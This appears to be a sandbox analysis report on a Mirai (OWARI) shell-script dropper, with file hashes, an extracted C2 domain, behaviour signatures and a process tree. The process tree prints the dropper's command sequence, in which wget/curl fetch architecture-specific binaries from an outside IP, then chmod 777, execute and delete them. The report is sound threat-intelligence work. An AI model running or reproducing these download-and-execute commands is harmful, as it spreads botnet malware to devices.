Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
152s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
-
submitted
12/03/2025, 03:56
General
-
Target
f6af632300305faf5db5b35ee6dfa2cc380484ecaf01d95b19da15454eab9cb0.sh
-
Size
2KB
-
MD5
e0347ebaf46c3662467aaeb0be087a53
-
SHA1
faf54de0e3691ffc53f2024470788e921cdfb1f3
-
SHA256
f6af632300305faf5db5b35ee6dfa2cc380484ecaf01d95b19da15454eab9cb0
-
SHA512
2a32c22e31e78e31a65aefcc2f369747d2d76caafa081b66f13e8dd82a5b41a819b1dc42bade80d4db7e2178f203cfc408919a9edd48ca4ce4b90cc71cdd4bdc
Malware Config
Extracted
mirai
OWARI
newageofkifirempire.camdvr.org
Extracted
mirai
OWARI
Extracted
mirai
OWARI
Extracted
mirai
OWARI
newageofkifirempire.camdvr.org
Extracted
mirai
OWARI
newageofkifirempire.camdvr.org
Extracted
mirai
OWARI
newageofkifirempire.camdvr.org
Signatures
-
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 10 IoCs
-
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Enumerates active TCP sockets 1 TTPs 2 IoCs
Gets active TCP sockets from /proc virtual filesystem.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Changes its process name 2 IoCs
-
Reads system network configuration 1 TTPs 2 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/f6af632300305faf5db5b35ee6dfa2cc380484ecaf01d95b19da15454eab9cb0.sh/tmp/f6af632300305faf5db5b35ee6dfa2cc380484ecaf01d95b19da15454eab9cb0.sh1⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
-
/usr/bin/wgetwget 141.98.10.50/zoopakilla/GoldAge3ATOarm2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O 141.98.10.50/zoopakilla/GoldAge3ATOarm2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 GoldAge3ATOarm2⤵
- File and Directory Permissions Modification
-
-
/tmp/GoldAge3ATOarm./GoldAge3ATOarm2⤵
-
-
/bin/rmrm -rf GoldAge3ATOarm2⤵
-
-
/bin/rmrm -rf GoldAge3ATOarm.12⤵
-
-
/usr/bin/wgetwget 141.98.10.50/zoopakilla/GoldAge3ATOarm62⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O 141.98.10.50/zoopakilla/GoldAge3ATOarm62⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 GoldAge3ATOarm62⤵
- File and Directory Permissions Modification
-
-
/tmp/GoldAge3ATOarm6./GoldAge3ATOarm62⤵
-
-
/bin/rmrm -rf GoldAge3ATOarm62⤵
-
-
/bin/rmrm -rf GoldAge3ATOarm6.12⤵
-
-
/usr/bin/wgetwget 141.98.10.50/zoopakilla/GoldAge3ATOm68k2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O 141.98.10.50/zoopakilla/GoldAge3ATOm68k2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 GoldAge3ATOm68k2⤵
- File and Directory Permissions Modification
-
-
/tmp/GoldAge3ATOm68k./GoldAge3ATOm68k2⤵
-
-
/bin/rmrm -rf GoldAge3ATOm68k2⤵
-
-
/bin/rmrm -rf GoldAge3ATOm68k.12⤵
-
-
/usr/bin/wgetwget 141.98.10.50/zoopakilla/GoldAge3ATOmips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O 141.98.10.50/zoopakilla/GoldAge3ATOmips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 GoldAge3ATOmips2⤵
- File and Directory Permissions Modification
-
-
/tmp/GoldAge3ATOmips./GoldAge3ATOmips2⤵
- System Network Configuration Discovery
-
-
/bin/rmrm -rf GoldAge3ATOmips2⤵
- System Network Configuration Discovery
-
-
/bin/rmrm -rf GoldAge3ATOmips.12⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget 141.98.10.50/zoopakilla/GoldAge3ATOmpsl2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O 141.98.10.50/zoopakilla/GoldAge3ATOmpsl2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 GoldAge3ATOmpsl2⤵
- File and Directory Permissions Modification
-
-
/tmp/GoldAge3ATOmpsl./GoldAge3ATOmpsl2⤵
-
-
/bin/rmrm -rf GoldAge3ATOmpsl2⤵
-
-
/bin/rmrm -rf GoldAge3ATOmpsl.12⤵
-
-
/usr/bin/wgetwget 141.98.10.50/zoopakilla/GoldAge3ATOppc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O 141.98.10.50/zoopakilla/GoldAge3ATOppc2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 GoldAge3ATOppc2⤵
- File and Directory Permissions Modification
-
-
/tmp/GoldAge3ATOppc./GoldAge3ATOppc2⤵
-
-
/bin/rmrm -rf GoldAge3ATOppc2⤵
-
-
/bin/rmrm -rf GoldAge3ATOppc.12⤵
-
-
/usr/bin/wgetwget 141.98.10.50/zoopakilla/GoldAge3ATOsh42⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O 141.98.10.50/zoopakilla/GoldAge3ATOsh42⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 GoldAge3ATOsh42⤵
- File and Directory Permissions Modification
-
-
/tmp/GoldAge3ATOsh4./GoldAge3ATOsh42⤵
-
-
/bin/rmrm -rf GoldAge3ATOsh42⤵
-
-
/bin/rmrm -rf GoldAge3ATOsh4.12⤵
-
-
/usr/bin/wgetwget 141.98.10.50/zoopakilla/GoldAge3ATOspc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O 141.98.10.50/zoopakilla/GoldAge3ATOspc2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 GoldAge3ATOspc2⤵
- File and Directory Permissions Modification
-
-
/tmp/GoldAge3ATOspc./GoldAge3ATOspc2⤵
-
-
/bin/rmrm -rf GoldAge3ATOspc2⤵
-
-
/bin/rmrm -rf GoldAge3ATOspc.12⤵
-
-
/usr/bin/wgetwget 141.98.10.50/zoopakilla/GoldAge3ATOx642⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O 141.98.10.50/zoopakilla/GoldAge3ATOx642⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 GoldAge3ATOx642⤵
- File and Directory Permissions Modification
-
-
/tmp/GoldAge3ATOx64./GoldAge3ATOx642⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
-
-
/bin/rmrm -rf GoldAge3ATOx642⤵
-
-
/bin/rmrm -rf GoldAge3ATOx64.12⤵
-
-
/usr/bin/wgetwget 141.98.10.50/zoopakilla/GoldAge3ATOx862⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O 141.98.10.50/zoopakilla/GoldAge3ATOx862⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 GoldAge3ATOx862⤵
- File and Directory Permissions Modification
-
-
/bin/rmrm -rf GoldAge3ATOx862⤵
-
-
/bin/rmrm -rf GoldAge3ATOx86.12⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
42KB
MD57b6a37e2b0f25ebdbd2a139e1da402cb
SHA1b3c5301e2b27d930bd38c7cbe15b3dad788105b9
SHA256d363895de44cd9baac35b511101e67224f90cf9da8818065bb4815863d9623c0
SHA512f10dd88b1cf6598bb610f888ddd4498fd2258dffec43ee628f24af404789ea979682717f9c6c35209d45ab080797de2cb5f9ff669137f0e360c2930a89fdbbcf
-
Filesize
53KB
MD511bc2be56b054f6de738fef4d7e676a8
SHA1627c06f31753633b6b143004ef2f9fa5d366cfaf
SHA256fa867339875a825778e3747878f069660264516cb8b3b1d01ecbb974416b5ffb
SHA512e2de3dfcfbb42275c937829d28278e89017d95ff73d051952b7403fb4b26e632f690a5e0c0108db10d5c6192134158b368a48d879eab16dd0690ad29defb077c
-
Filesize
41KB
MD5bb0970d3af844bdb3252e4d471f1bf7a
SHA1674dbabe05b67433431db94c5432a887c156e78c
SHA2560e5a52ab7b26d9c7cc4f617cd9ab7a3603cd0c151ec7c5de7808c48c8d274e9c
SHA512693f861483cc3f551b4e1f72cdd978fff18b3646f8051881df8e98e996110d5ac45ff1d1476be374492313ebd676d4b6bacbc6909cdd576f8cc23c7f87a07d08
-
Filesize
53KB
MD5dd710f08451295fe8edf8403549f2372
SHA1abed845d3c83f41f237cf028f81f4ccae8e70026
SHA25692041a19a1ccaee03c62c1726d2a63b864d00c73912a89c4e4ecf3673bc7035e
SHA512732c87dda9eb0c1c43264f1196a6f12acfd4e33ea24b0893d17dc82157407a10f8b7429fc387c54f98718619ff63861257b1c5bee8ff90c7f9395015e3d356d8
-
Filesize
55KB
MD5fbad3fb44b71511e379b26e68b64a8b0
SHA17b06f8b3e8ac5d3877ce53fff6b4db4802f9525c
SHA256ca3237ae7d2c37212f7409af56b4c3f713e5b9c92d29b904934a602500606a50
SHA5121d374feb0ed9663b20c5b47c2412447cb1271e20ef371d21961676691ad1423bad7c9c2fe81d28f6fffe6389728bf468e524c1b8b479991ed1efba2da8dfa177
-
Filesize
39KB
MD558c242db59b710eec7620b5500c9b529
SHA19d5478e5f6b902d12ff3818098742f007989f9f6
SHA256e585d49530979ac2507c1a11c51acc1e0889d23cf26292d05c34142850cc9e01
SHA5123ad955c2d4d0a8168bc2b98d47030ebbb77ca21a371baea879103f8fdadc31c90d5c879f9ed7e6c2f51a7a051c09f0dbe0685fce00b19f5d7065764895c33b64
-
Filesize
36KB
MD5fb0e935532cea0ab6307f7b2af25be73
SHA1bc0040aee854809c401129c5e7623bb176f8dcfc
SHA256db237a423289072365e7d35f67017238a5b427899d653a31cc97142f0ccbd732
SHA512bfe94c50e673840c4d312677b6815ea5ebcb2c14346599ccb103a52e08fc1f5c59d647d70843305ef8a9afcdba0a9f571d97b426019c14dc081b90b31dd32ac9
-
Filesize
44KB
MD5c90d87b96b3d72e6c80ff3082a429acd
SHA19e1fe7d87537e94dddc41d94d9631c19c17c5ace
SHA256d8b7af847acedab0a4aec9b8df48d1872c1fa7ee521c4219a9f34d01ef0e596d
SHA512340f3cf6b653615f03a95eedcda86b7f832c42dadea492a49069ee517ea74de54476a2aed3a7fb62580775e07550a35c34341428804b2be21ed2b114b005fe45
-
Filesize
41KB
MD5f3aac3b51975d952e28355dcfc94bd34
SHA134860acc902b696c536e748d0386c88a7c5b9299
SHA2569740a38b59c5221179d726e42527f97e66155139502a645e50ea4a795dcc61a7
SHA512a00a45b4d86de87ac7d7d99af692ddcedd3eaddd08396379112d888bd0b2b80af89bbd4da85bb267b79942f95e2cdcdc4e0893118a49ae5c04835d101e0b81e4
-
Filesize
37KB
MD5e6c7b6cfb5424c1d3736a06621d53ebb
SHA16f2f27a698573ba77bdfae084ba63ca80c92a411
SHA2561c192ac6e52572d12008930f303929fa4559cf200b196f661251cc08a6629b8e
SHA5128ee330a4f0d154534cd97d86ea7557439ecb7c1e5adfaa1af0f23f027f1cbdaea8b88b8c44221d29bf68ea1a74fcff319a71380145be6fbfef1910d5a7611c33